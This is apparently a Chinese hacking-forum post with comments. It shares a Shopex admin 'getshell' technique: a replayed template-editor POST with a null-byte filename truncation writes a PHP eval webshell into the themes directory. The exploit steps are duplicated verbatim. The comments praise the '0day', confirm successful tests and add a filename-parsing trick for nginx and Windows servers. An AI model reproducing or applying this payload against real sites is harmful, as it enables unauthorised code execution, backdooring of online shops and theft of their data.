Shopex 后台getshell
好几个问我要。。既然如此 就发了吧。。
应为SHOPEX把GPC转义回来了
在模板编辑那里 可以直接截断文件名,
代码就不贴了。利用方法
打开
./shopadmin/index.php#ctl=system/template&act=editor&p[0]=black&p[1]=index.html
随便点一个编辑
利用火狐插件
LIVE HTTP HEADER 抓包
点击replay
将post的内容改为
theme=purple&file=index(2).php%00.html&type=index(2)&file_name=&isbak=1&__=1&content=<?php eval($_POST[c])?>
点击repaly提交
然后./themes/purple/index(2).php 便是shell
应为SHOPEX把GPC转义回来了
在模板编辑那里 可以直接截断文件名,
代码就不贴了。利用方法
打开
./shopadmin/index.php#ctl=system/template&act=editor&p[0]=black&p[1]=index.html
随便点一个编辑
利用火狐插件
LIVE HTTP HEADER 抓包
点击replay
将post的内容改为
theme=purple&file=index(2).php%00.html&type=index(2)&file_name=&isbak=1&__=1&content=<?php eval($_POST[c])?>
点击repaly提交
然后./themes/purple/index(2).php 便是shell
关于作者
评论39次
我还有 3种拿shell的方法 年底公布
这事 哎……
膜拜大牛= =、
不错的方法。
好强悍的一个0day
搞了两个小时了,一直都是这个样子,求大牛指点~~~怎么是这个样子的啊,
恭喜0day~
乌云那个可以直接创建PHP后缀马?
不错,不错,谢谢大牛分享0day
似乎是和乌云的一样内容了
为什么这个抓包 我总是抓不到这个post 包 上传不成功啊 求教啊
这个 抓包 牛逼 。 。
这个貌似挺老了
这个是菜刀的截图实测可以的
nginx 不行吧
8楼 V5
上传.php;这样的后缀就好。解析漏洞nginx和window基本都可以
那个S。B 呵呵 测试成功
那个啥。。。表示测试成功!~~
支持0day 哈哈